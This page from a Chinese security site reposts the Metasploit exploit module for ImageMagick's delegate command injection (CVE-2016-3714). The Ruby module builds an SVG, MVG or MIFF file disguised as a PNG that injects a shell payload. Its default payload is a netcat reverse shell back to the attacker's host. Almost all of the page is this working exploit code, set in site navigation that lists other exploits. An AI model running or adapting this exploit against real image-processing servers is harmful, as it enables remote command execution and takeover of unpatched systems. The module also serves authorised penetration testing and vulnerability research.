首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 ImageMagick Delegate Arbitrary Command Execution 来源：metasploit.com 作者：hdm 发布时间：2016-05-10   ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##   class MetasploitModule < Msf::Exploit     Rank = ExcellentRanking     include Msf::Exploit::FILEFORMAT     def initialize(info = {})     super(update_info(info,       'Name'            => 'ImageMagick Delegate Arbitrary Command Execution',       'Description'     => %q{         This module exploits a shell command injection in the way "delegates"         (commands for converting files) are processed in ImageMagick versions         <= 7.0.1-0 and <= 6.9.3-9 (legacy).           Since ImageMagick uses file magic to detect file format, you can create         a .png (for example) which is actually a crafted SVG (for example) that         triggers the command injection.           Tested on Linux, BSD, and OS X. You'll want to choose your payload         carefully due to portability concerns. Use cmd/unix/generic if need be.       },       'Author'          => [         'stewie',            # Vulnerability discovery         'Nikolay Ermishkin', # Vulnerability discovery         'wvu',               # Metasploit module         'hdm'                # Metasploit module       ],       'References'      => [         %w{CVE 2016-3714},         %w{URL https://imagetragick.com/},         %w{URL http://seclists.org/oss-sec/2016/q2/205},         %w{URL https://github.com/ImageMagick/ImageMagick/commit/06c41ab},         %w{URL https://github.com/ImageMagick/ImageMagick/commit/a347456}       ],       'DisclosureDate'  => 'May 3 2016',       'License'         => MSF_LICENSE,       'Platform'        => 'unix',       'Arch'            => ARCH_CMD,       'Privileged'      => false,       'Payload'         => {         'BadChars'      => "\x22\x27\x5c", # ", ', and \         'Compat'        => {           'PayloadType' => 'cmd cmd_bash',           'RequiredCmd' => 'generic netcat bash-tcp'         }       },       'Targets'         => [         ['SVG file',  template: 'msf.svg'], # convert msf.png msf.svg         ['MVG file',  template: 'msf.mvg'], # convert msf.svg msf.mvg         ['MIFF file', template: 'msf.miff'] # convert -label "" msf.svg msf.miff       ],       'DefaultTarget'   => 0,       'DefaultOptions'  => {         'PAYLOAD'               => 'cmd/unix/reverse_netcat',         'LHOST'                 => Rex::Socket.source_address,         'DisablePayloadHandler' => false,         'WfsDelay'              => 9001       }     ))       register_options([       OptString.new('FILENAME', [true, 'Output file', 'msf.png'])     ])   end     def exploit     if target.name == 'SVG file'       p = Rex::Text.html_encode(payload.encoded)     else       p = payload.encoded     end       file_create(template.sub('echo vulnerable', p))   end     def template     File.read(File.join(       Msf::Config.data_directory, 'exploits', 'CVE-2016-3714', target[:template]     ))   end   end   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·RPCScan 2.03 - Hostname/IP Fie ·Ruby on Rails Development Web ·CIScan 1.00 - Hostname/IP Fiel ·PHP 5.2.x Safe Mode Windows By ·ASUS Memory Mapping Driver (AS ·MediaInfo 0.7.61 - Crash PoC ·Dell SonicWall Scrutinizer <= ·Ipswitch WS_FTP LE 12.3 - Sear ·i.FTP 2.21 - Host Address / UR ·Core FTP Server 32-bit Build 5 ·Baidu Spark Browser 43.23.1000 ·Linux Kernel bpf related UAF V   推荐广告

CopyRight © 2002-2025 VFocuS.Net All Rights Reserved